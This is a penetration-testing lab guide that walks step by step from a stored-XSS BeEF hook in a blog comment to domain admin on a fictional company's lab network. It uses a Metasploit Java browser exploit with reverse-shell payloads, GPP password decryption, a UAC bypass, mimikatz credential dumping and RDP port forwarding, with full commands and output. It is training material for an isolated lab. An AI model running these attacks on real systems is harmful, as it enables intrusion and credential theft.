© 2018 Caendra, Inc.

| Hera for PTP | From XSS to Domain Admin 1

FooResearch asked you to perform a pentest against its infrastructure. The company has a
website which hosts a blog. The comment section in the blog is vulnerable to stored XSS
attacks. FooResearch’s employees browse the blog during throughout their work day.

You can reach the site and the blog at:

• blog.fooresearch.site (172.16.111.1)

Note: Add the following to your /etc/hosts file in order to resolve the host:

172.16.111.1 blog.fooresearch.site

To contact the web application, you can either use its DNS name or its IP address. It doesn't
matter for this lab which option you choose.

Here is the lab environment:

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 2
 • Get a shell to an internal machine by exploiting the XSS in the blog
• Get some local administrator credentials
• Get Active Directory administrator credentials
• Get access to a domain controller as a domain administrator
• As a proof of concept for your report, take a screenshot of an admin RDP session on
the domain controller

• Basic XSS exploitation

• BeEF-XSS usage to perform information gathering
• Using Metasploit to get a shell on a system
• Default, weak, Active Directory policies ACL’s
• Bypassing UAC
• How to Obtain Credentials using MimiKatz

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired though the task you can achieve the Lab goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this paper and check
the solutions.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 3
 • Browser
• BeEF-XSS
• Metasploit

Hook an internal browser with BeEF-XSS. Your XSS has to be stealth. If a user detects
something strange, for example an alert(), they will stop browsing the blog.

Get information about the browser and its plugins, try to find a vulnerable plugin to exploit.

Using the information gathered get a shell on an internal machine.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 4
Get information about the AD infrastructure, especially:

• The domain name

• Information about domain controllers

Exploiting default group policies’ files permission get the username and password of a local
administrator account.

Identify other hosts on the network and get information about their operating systems.

Choose your next target and use the credentials you got at the previous task to get a shell.

Find a way to cause a Domain Administrator to connect to the target machine.

Find a way to steal an authorization token or credentials of a domain administrator.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 5
Open an RDP connection to a domain controller as a domain admin as PoC of your
exploitation.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 6
© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 7
Start BeEF-XSS and inject its hooking script in the comment section of the blog. Something
like:

<script src="http://address:3000/hook.js"></script>

Remember to use your VPN address in the payload. Once a victim visits the blog you will
find a new entry in the BeEF console. Your browser will be hooked too :-)

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 8
Use BeEF’s Details tab and the Host > Get System Info command within the
“Commands” tab to get information about the browser, the OS and the plugins installed.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 9
As you can see from the second screenshot Java 1.0.0_17 is installed. Let us move on to
Metasploit to find if we can exploit the plugin.

Metasploit has some modules to exploit jre17 vulnerabilities. You can use
java_jre17_provider_skeleton as it is very stable.

msf > use exploit/multi/browser/java_jre17_provider_skeleton

msf exploit(multi/browser/java_jre17_provider_skeleton) >

It has several targets available, you can see them by typing the “show targets” command.

msf exploit(multi/browser/java_jre17_provider_skeleton) > show targets

Exploit targets:

Id Name

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 10
 -- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Mac OS X x86 (Native Payload)
3 Linux x86 (Native Payload)

msf exploit(multi/browser/java_jre17_provider_skeleton) >

As you know (from Task 2) the OS is a Windows 7 32 bit you can set it as a target:

msf exploit(multi/browser/java_jre17_provider_skeleton) > set TARGET 1

Then you can select a windows specific payload, by typing:

> set payload windows/meterpreter/reverse_tcp

Then, you can configure the following options:

• Set SRVHOST as your VPN IP address

• Set LHOST as your VPN IP address
• Set SRVPORT and LPORT as you prefer, ensuring to make them both different.

And finally, the exploit command will generate a URL hosting a malicious Java applet.

msf exploit(multi/browser/java_jre17_provider_skeleton) > set SRVHOST

172.16.111.30
SRVHOST => 172.16.111.30
msf exploit(multi/browser/java_jre17_provider_skeleton) > set LHOST
172.16.111.30
LHOST => 172.16.111.30
msf exploit(multi/browser/java_jre17_provider_skeleton) > set SRVPORT 8888
SRVPORT => 8888
msf exploit(multi/browser/java_jre17_provider_skeleton) > set LPORT 8889
LPORT => 8889
msf exploit(multi/browser/java_jre17_provider_skeleton) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.111.30:8889

msf exploit(multi/browser/java_jre17_provider_skeleton) > [*] Using URL:
http://172.16.111.30:8888/QjXAmeJ
[*] Server started.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 11
Now, you can send this payload to a vulnerable machine in two ways:

• You can re-use the XSS in the blog

• You can inject an invisible iframe in the hooked browser

Choosing the second option gives you a better control over your exploiting session. This
way you can exploit just the machine you hooked via BeEF.

If you choose the first option, you could inject your payload also to other machines.

On BeEF you can use the Misc > Create Invisible Iframe command:

After some seconds the browser will receive and execute the payload, thus giving you a
Meterpreter shell on the victim machine.

By using the sessions -i 1 command in msfconsole, you will access to the interactive
Meterpreter shell.

You can get some information about the system and your privileges by using some
standard Meterpreter commands, like:

• Sysinfo

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 12
 • Getuid
• Ifconfig

And so on…

As you can see you have standard user privileges, so you cannot escalate to system
privileges, as can be seen with the “getsystem” command in the screenshot below.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 13
Remember to keep track of the IP address and the most relevant information about the
machine. You will need the network address (192.168.200.0/24) later.

You can carry on the Active directory exploitation by using a standard cmd shell. Metasploit
gives you some modules to do that, but they do not work in every case or configuration.

You can drop a cmd shell by issuing the shell command to meterpreter.

Then you can use the set command to get information about the environment variables in
your victim’s environment.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 14
The most interesting values are:

• LOGONSERVER, gives you information about the domain controller used for
authentication
• USERDNSDOMAIN, gives you information about the FQDN of the AD domain
• USERDOMAIN, contains the name of the AD domain in NT format
• USERNAME, contains the current username in NT format

You can also use some Meterpreter commands to get information from the AD
infrastructure by loading the extapi extension.

> load extapi

And then enumerate computer and users:

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 15
Active Directory policies are stored in a special UNC path:

%USERDNSDOMAIN%\Policies

But you cannot access UNC paths via cmd, so you have to use the Sysvol share you can find
on a domain controller:

%LOGONSERVER%\Sysvol

First, drop into a shell again via meterpreter:

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 16
meterpreter > shell
Process 3472 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\SecondUser\Desktop>

Next, we can use the “net use” command to mount the SysVol share on the Domain
Controller as a drive called “X”:

C:\Users\SecondUser\Desktop>net use X: \\DC01\SysVol

net use X: \\DC01\SysVol
The command completed successfully.

C:\Users\SecondUser\Desktop>X:
X:

X:\>cd examplead.lan\Policies
cd examplead.lan\Policies

X:\examplead.lan\Policies>dir
dir
Volume in drive X has no label.
Volume Serial Number is 6C66-920E

Directory of X:\examplead.lan\Policies

07/31/2014 05:10 AM <DIR> .

07/31/2014 05:10 AM <DIR> ..
06/24/2014 03:20 AM <DIR> {31B2F340-016D-11D2-945F-00C04FB984F9}
07/31/2014 05:11 AM <DIR> {69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}
06/24/2014 03:20 AM <DIR> {6AC1786C-016F-11D2-945F-00C04fB984F9}
06/24/2014 06:43 AM <DIR> {7635CC99-2423-4809-A2E6-20A9BB8294BB}
07/17/2014 05:40 AM <DIR> {9E4B6CF5-DE26-4631-A4A6-D0C845998366}

Than you can find user creation policies by searching for groups.xml files in the policies
directory.

X:\examplead.lan\Policies>dir /s *.xml
dir /s *.xml
Volume in drive X has no label.
Volume Serial Number is 6C66-920E

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 17
 Directory of X:\examplead.lan\Policies\{69BCC2AD-B7E5-4E02-833D-
DBFDD19E7EB4}\Machine\Preferences\Groups

07/31/2014 05:11 AM 830 Groups.xml

1 File(s) 830 bytes

Directory of X:\examplead.lan\Policies\{9E4B6CF5-DE26-4631-A4A6-
D0C845998366}\Machine\Preferences\Groups

07/17/2014 05:40 AM 352 Groups.xml

1 File(s) 352 bytes

Total Files Listed:

2 File(s) 1,182 bytes
0 Dir(s) 712,482,816 bytes free

X:\examplead.lan\Policies>

Those files contain information about local users and groups deployed via group policies.

System administrators usually use AD policies to deploy a local administrator account in a

domain environment.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 18
Those files also contain information about usernames, encrypted passwords and the
groups.

X:\examplead.lan\Policies>type X:\examplead.lan\Policies\{69BCC2AD-B7E5-4E02-
833D-DBFDD19E7EB4}\Machine\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User
clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LADM" image="0"
changed="2014-07-31 12:11:27" uid="{02526B4C-A2A5-48D9-A357-
80B0D8E9825D}"><Properties action="C" fullName="" description=""
cpassword="0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY" changeLogon="0"
noChange="0" neverExpires="1" acctDisabled="0" userName="LADM"/></User>
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}"
name="Administrators" image="2" changed="2014-07-31 12:11:54" uid="{AEAF1E3C-
2DC1-4206-A907-6064727BB08A}"><Properties action="U" newName=""
description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0"
groupName="Administrators"><Members><Member name="LADM" action="ADD"
sid=""/></Members></Properties></Group>
</Groups>

X:\examplead.lan\Policies>

The previous output contains the following information:

• LADM is the user;

• 0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY is the encrypted password;
• The policy adds that user to the Administrators group.

To decrypt the password, you can use the gpp-decrypt tool in kali.

$ gpp-decrypt 0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY
Pm2fUXScqI

Pm2fUXScqI is the clear text password of LADM.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 19
You can find other Windows machines by running a post module within the Meterpreter
session.

To get information about any kind of machine, you should also use other methods like a
ping sweep or a port scan on the 192.168.200.0/24 network.

To do that you need to route the traffic from other Metasploit modules through your
existing Meterpreter session:

meterpreter> background
msf> route add 192.168.200.0 255.255.255.0 1
[*] Route added

To detect the SMB version, thus the OS version, of the Windows machines you can use the
“smb_version” scanner module:

msf> use auxiliary/scanner/smb/smb_version

msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.200.100,200,210
msf auxiliary(scanner/smb/smb_version) > exploit
[+] 192.168.200.100:445 - Host is running Windows 2008 Datacenter SP1
(build:6001) (name:DC01) (domain:EXAMPLEAD)
[*] Scanned 1 of 3 hosts (33% complete)
[*] 192.168.200.200:445 - Host could not be identified: ()
[*] Scanned 2 of 3 hosts (66% complete)
[+] 192.168.200.210:445 - Host is running Windows 7 Professional SP1
(build:7601) (name:PCCLIENT7) (domain:EXAMPLEAD)
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 20
The module discovers a Windows 2008, an unidentified host, and the Windows 7 machine
you already got the shell on.

We’ll continue on our path from our existing Windows 7 shell for now, as it will be a good
learning lesson along the way :)

Windows 7 does not accept a psexec command from a non-domain admin by default, so
you need a way to get around that.

To get an administrator shell you have to create an executable with msfvenom or

msfconsole, upload it to the compromised machine and then execute it with the LADM
credentials.

msf> use payload/windows/meterpreter/reverse_tcp

Configure it to connect back to your machine and generate an executable file

msf payload(windows/meterpreter/reverse_tcp) > set LHOST 172.16.111.30

LHOST => 172.16.111.30
msf payload(windows/meterpreter/reverse_tcp) > set LPORT 11112
LPORT => 11112
msf payload(windows/meterpreter/reverse_tcp) > generate -f msfadexploit.exe -
t exe
[*] Writing 73802 bytes to msfadexploit.exe...
msf payload(windows/meterpreter/reverse_tcp) >

To receive the connection, you can use the multi_handler modules.

It is up to you to choose if you want to run the handler from a second msfconsole, or you
want to run it in the background by using the -j switch for the exploit command.

msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 11112
LPORT => 11112
msf exploit(multi/handler) > set LHOST 172.16.111.30
LHOST => 172.16.111.30
msf exploit(multi/handler) > exploit -j

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 21
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 172.16.111.30:11112

msf exploit(multi/handler) >

In a domain environment, a default Windows 7 machine:

• does not accept a psexec command from a non-domain administrator

• has UAC enabled
• prevents a local administrator from accessing a user’s profile without a UAC prompt

To get around the first two limitations you can upload the generated exploit exe to the
target machine, and we can then use the “windows/manage/run_as” module to execute
our payload as the LADM user for which we’ve obtained credentials for via the SysVol
information disclosure.

First, we should upload our payload to the target:

msf exploit(multi/handler) > sessions -i 1

[*] Starting interaction with 1...
meterpreter > cd ../
meterpreter > upload msfadexploit.exe
[*] uploading : msfadexploit.exe -> msfadexploit.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): msfadexploit.exe ->
msfadexploit.exe
[*] uploaded : msfadexploit.exe -> msfadexploit.exe

Next, we’ll use the icacls cmd command to grant full control to “Everyone” for the
payload we uploaded to the SecondUser user directory:

meterpreter > shell

Process 896 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\SecondUser>icacls msfadexploit.exe /grant Everyone:(F)

icacls msfadexploit.exe /grant Everyone:(F)
processed file: msfadexploit.exe
Successfully processed 1 files; Failed processing 0 files

C:\Users\SecondUser>

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 22
Finally, we can configure the windows/manage/run_as module to execute our payload as
the LADM user:

msf exploit(multi/handler) > use post/windows/manage/run_as

msf post(windows/manage/run_as) > set CMD
C:\\Users\\SecondUser\\msfadexploit.exe
CMD => C:\Users\SecondUser\msfadexploit.exe
msf post(windows/manage/run_as) > set USER LADM
USER => LADM
msf post(windows/manage/run_as) > set PASSWORD Pm2fUXScqI
PASSWORD => Pm2fUXScqI
msf post(windows/manage/run_as) > set SESSION 1
SESSION => 1
msf post(windows/manage/run_as) > set DOMAIN PCCLIENT7
DOMAIN => PCCLIENT7
msf post(windows/manage/run_as) > exploit

This should result in getting another meterpreter session, this time however, as the LADM
user.

[*] Executing CreateProcessWithLogonW...

[+] Process started successfully, PID: 3792
[*] Command Run: cmd.exe /c C:\Users\SecondUser\msfadexploit.exe
[*] Post module execution completed
msf post(windows/manage/run_as) >
[*] Sending stage (179779 bytes) to 172.16.111.1
[*] Meterpreter session 2 opened (172.16.111.30:11112 -> 172.16.111.1:65223)
at 2018-05-03 18:03:28 -0400

msf post(windows/manage/run_as) > sessions -i 2

[*] Starting interaction with 2...

meterpreter > getuid

Server username: PCCLIENT7\LADM
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following
was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >

The new Meterpreter session runs under local administrator account privileges. We can
also see above, that the “getsystem” command fails with an “Access Denied” error. If you
want to escalate to SYSTEM, you must bypass UAC.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 23
We background the meterpreter session, and load the bypassuac_injection module to
accomplish this.

Note: Make sure you configure the module for the session running under the LADM user.
This should be the newest session.

msf post(windows/manage/run_as) > use

exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set SESSION 2
msf exploit(windows/local/bypassuac_injection) > set payload
windows/meterpreter/reverse_tcp
msf exploit(windows/local/bypassuac_injection) > set LHOST 172.16.111.30
LHOST => 172.16.111.30
msf exploit(windows/local/bypassuac_injection) > set LPORT 11113
LPORT => 11112
sf exploit(windows/local/bypassuac_injection) > exploit

[*] Started reverse TCP handler on 172.16.111.30:11113

[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[+] Successfully injected payload in to process: 2992
[*] Sending stage (179779 bytes) to 172.16.111.1
[*] Meterpreter session 3 opened (172.16.111.30:11113 -> 172.16.111.1:47484)
at 2018-05-03 18:06:22 -0400

meterpreter >

If the module fails the first time, you may need to run it a couple of times before
successfully bypass UAC.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 24
You know that LegacyApp and ModernApp are used by users. You can see ModernApp.exe
running on the Windows 7 machine by issuing the ps command in meterpreter.

If you try to kill the application, the user will re-open it, but if you kill it and then delete the
executable file, the user will not be able to run it again. If a user cannot run a business
application, they will call the IT Support.

Then someone from the IT staff will connect to the machine to fix the problem. The idea
here is that a network administrator will connect to the machine to restart the application,
which should leave credentials in memory.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 25
After waiting some time for the admin to connect, you can re-check the running processes
and confirm that the Domain Administrator has authenticated to the machine running
several processes.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 26
We can now dump the Domain Administrators’ credentials using mimikatz.

In order to load mimikatz, we should first run the “getsystem” command from our
meterpreter session.

Next, now that we’re SYSTEM on the target, let’s see if we can use mimikatz to dump the
“exampleadm” users’ password from memory.

First, we’ll load the mimikatz extension from our current meterpreter session:

meterpreter > load mimikatz

Loading extension mimikatz...Success.

Next, we run the “Kerberos” command, but quickly realize there are no passwords to be
obtained here.

meterpreter > kerberos

[+] Running as SYSTEM
[*] Retrieving kerberos credentials

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 27
kerberos credentials
====================

AuthID Package Domain User Password

------ ------- ------ ---- --------
0;2339883 NTLM PCCLIENT7 LADM
0;2339854 NTLM PCCLIENT7 LADM
0;1037535 Negotiate EXAMPLEAD ExampleAdm
0;1037506 Kerberos EXAMPLEAD ExampleAdm
0;923457 NTLM PCCLIENT7 LADM
0;923428 NTLM PCCLIENT7 LADM
0;66524 Kerberos EXAMPLEAD SecondUser

We can see our “ExampleAdm” user in the output above, however, no password. We try the
“wdigest” option which ultimately, is a success.

meterpreter > wdigest

[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID Package Domain User Password

------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;38832 NTLM
0;2339883 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;2339854 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;923457 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;923428 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;66524 Kerberos EXAMPLEAD SecondUser consciousAlert...
0;1037535 Negotiate EXAMPLEAD ExampleAdm manageth3PC'z
0;1037506 Kerberos EXAMPLEAD ExampleAdm manageth3PC'z

We can see we have obtained the Domain Admin credentials!

Using this information, we can proceed to trying to connect to the domain controller using
the newly acquired credentials.

To connect via remote desktop, we have to first forward our RDP traffic through an existing
Meterpreter session.

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 28
We’ll forward the port 3389 (RDP) of the DC01 machine (192.168.200.100) to your local
machine.

meterpreter > portfwd add -L 127.0.0.1 -l 3389 -r 192.168.200.100 -p 3389

[*] Local TCP relay created: 127.0.0.1:3389 <-> 192.168.200.100:3389
meterpreter >

Then you can connect via RDP to your localhost address

$ rdesktop -u examplead\\exampleadm -p "manageth3PC'z" 127.0.0.1

© 2018 Caendra, Inc. | Hera for PTP | From XSS to Domain Admin 29